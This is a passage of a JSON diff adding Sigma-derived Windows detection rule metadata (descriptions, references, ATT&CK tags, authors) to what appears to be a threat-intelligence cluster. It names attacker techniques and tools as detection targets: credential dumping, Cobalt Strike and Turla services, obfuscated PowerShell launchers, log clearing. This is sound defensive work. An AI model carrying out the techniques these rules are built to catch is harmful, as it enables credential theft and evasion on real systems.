and accounts of Microsoft Teams desktop application.", + "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "value": "Suspicious Teams Application Related ObjectAcess Event", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ], + "creation_date": "2022/09/16", + "filename": "win_security_teams_suspicious_objectaccess.yml", + "author": "@SerkinValery", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", + "value": "Transferring Files with Credential Data via Network Shares", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" + ], + "creation_date": "2019/10/22", + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Transferring sensitive files for legitimate administration work by legitimate administrator" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", + "value": "User Added to Local Administrators", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078", + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2017/03/14", + "filename": "win_security_user_added_to_local_administrators.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "uuid": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "value": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "meta": { + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" + ], + "creation_date": "2019/10/24", + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", + "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", + "value": "Local User Creation", + "meta": { + "refs": [ + "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ], + "creation_date": "2019/04/18", + "filename": "win_security_user_creation.yml", + "author": "Patrick Bareiss", + "level": "low", + "falsepositive": [ + "Domain Controller Logs", + "Local accounts managed by privileged account management tools" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools.\nSo you have to work with a whitelist to find the bad stuff.\n", + "uuid": "f63508a0-c809-4435-b3be-ed819394d612", + "value": "Suspicious Driver Loaded By User", + "meta": { + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2019/04/08", + "filename": "win_security_user_driver_loaded.yml", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "level": "medium", + "falsepositive": [ + "Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", + "uuid": "0badd08f-c6a3-4630-90d3-6875cca440be", + "value": "User Logoff Event", + "meta": { + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/14", + "filename": "win_security_user_logoff.yml", + "author": "frack113", + "level": "informational", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", + "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", + "value": "VSSAudit Security Event Source Registration", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2020/10/20", + "filename": "win_security_vssaudit_secevent_source_registration.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "level": "informational", + "falsepositive": [ + "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", + "value": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/10/12", + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88", + "value": "WMI Persistence - Security", + "meta": { + "refs": [ + "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ], + "creation_date": "2017/08/22", + "filename": "win_security_wmi_persistence.yml", + "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "uuid": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "value": "Microsoft Defender Blocked from Loading Unsigned DLL", + "meta": { + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/02", + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "uuid": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "value": "Unsigned Binary Loaded From Suspicious Location", + "meta": { + "refs": [ + "https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/03", + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "value": "HybridConnectionManager Service Running", + "meta": { + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ], + "creation_date": "2021/04/12", + "filename": "win_hybridconnectionmgr_svc_running.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Legitimate use of Hybrid Connection Manager via Azure function apps." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "uuid": "83c161b6-ca67-4f33-8ad0-644a0737cf07", + "value": "Suspicious Application Installed", + "meta": { + "refs": [ + "https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/14", + "filename": "win_shell_core_susp_packages_installed.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Packages or applications being legitimately used by users or administrators" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "value": "Suspicious Rejected SMB Guest Logon From IP", + "meta": { + "refs": [ + "https://twitter.com/KevTheHermit/status/1410203844064301056", + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.001" + ], + "creation_date": "2021/06/30", + "filename": "win_susp_failed_guest_logon.yml", + "author": "Florian Roth, KevTheHermit, fuzzyf10w", + "level": "medium", + "falsepositive": [ + "Account fallback reasons (after failed login with specific account)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects repeated failed (outgoing) attempts to mount a hidden share", + "uuid": "1c3be8c5-6171-41d3-b792-cab6f717fcdb", + "value": "Failed Mounting of Hidden Share", + "meta": { + "refs": [ + "https://twitter.com/moti_b/status/1032645458634653697", + "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml" + ], + "tags": [ + "attack.t1021.002", + "attack.lateral_movement" + ], + "creation_date": "2022/08/30", + "filename": "win_susp_failed_hidden_share_mount.yml", + "author": "Fabian Franz", + "level": "medium", + "falsepositive": [ + "Legitimate administrative activity", + "Faulty scripts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects application popup reporting a failure of the Sysmon service", + "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "value": "Sysmon Crash", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_application_sysmon_crash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2022/04/26", + "filename": "win_system_application_sysmon_crash.yml", + "author": "Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "uuid": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "value": "Turla Service Install", + "meta": { + "refs": [ + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1543.003" + ], + "creation_date": "2017/03/31", + "filename": "win_system_apt_carbonpaper_turla.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "value": "Chafer Activity - System", + "meta": { + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/03/23", + "filename": "win_system_apt_chafer_mar18_system.yml", + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "uuid": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "value": "StoneDrill Service Install", + "meta": { + "refs": [ + "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_stonedrill.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0064", + "attack.t1543.003" + ], + "creation_date": "2017/03/07", + "filename": "win_system_apt_stonedrill.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "uuid": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "value": "Turla PNG Dropper Service", + "meta": { + "refs": [ + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_turla_service_png.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1543.003" + ], + "creation_date": "2018/11/23", + "filename": "win_system_apt_turla_service_png.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", + "value": "CobaltStrike Service Installations - System", + "meta": { + "refs": [ + "https://www.sans.org/webcasts/119395", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ], + "creation_date": "2021/05/26", + "filename": "win_system_cobaltstrike_service_installs.yml", + "author": "Florian Roth, Wojciech Lesicki", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", + "uuid": "6c0a7755-6d31-44fa-80e1-133e57752680", + "value": "Windows Defender Threat Detection Disabled - Service", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_defender_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/07/28", + "filename": "win_system_defender_disabled.yml", + "author": "J\u00e1n Tren\u010dansk\u00fd, frack113", + "level": "low", + "falsepositive": [ + "Administrator actions", + "Auto updates of Windows Defender causes restarts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "value": "Eventlog Cleared", + "meta": { + "refs": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ], + "creation_date": "2017/01/10", + "filename": "win_system_eventlog_cleared.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "uuid": "52a85084-6989-40c3-8f32-091e12e13f09", + "value": "smbexec.py Service Installation", + "meta": { + "refs": [ + "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_hack_smbexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" + ], + "creation_date": "2018/03/20", + "filename": "win_system_hack_smbexec.yml", + "author": "Omer Faruk Celik", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_clip_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "win_system_invoke_obfuscation_clip_services.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "uuid": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "meta": { + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_obfuscated_iex_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2019/11/08", + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_stdin_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "win_system_invoke_obfuscation_stdin_services.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "value": "Invoke-Obfuscation VAR+ Launcher - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_var_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "win_system_invoke_obfuscation_var_services.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_compress_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "win_system_invoke_obfuscation_via_compress_services.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_rundll_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "uuid": "487c7524-f892-4054-b263-8a0ace63fc25", + "value": "Invoke-Obfuscation Via Stdin - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_stdin_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/12", + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "value": "Invoke-Obfuscation Via Use Clip - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_clip_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "value": "Invoke-Obfuscation Via Use MSHTA - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_mshta_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "value": "Invoke-Obfuscation Via Use Rundll32 - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_rundll32_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_var_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "win_system_invoke_obfuscation_via_var_services.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "value": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "meta": { + "refs": [ + "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d", + 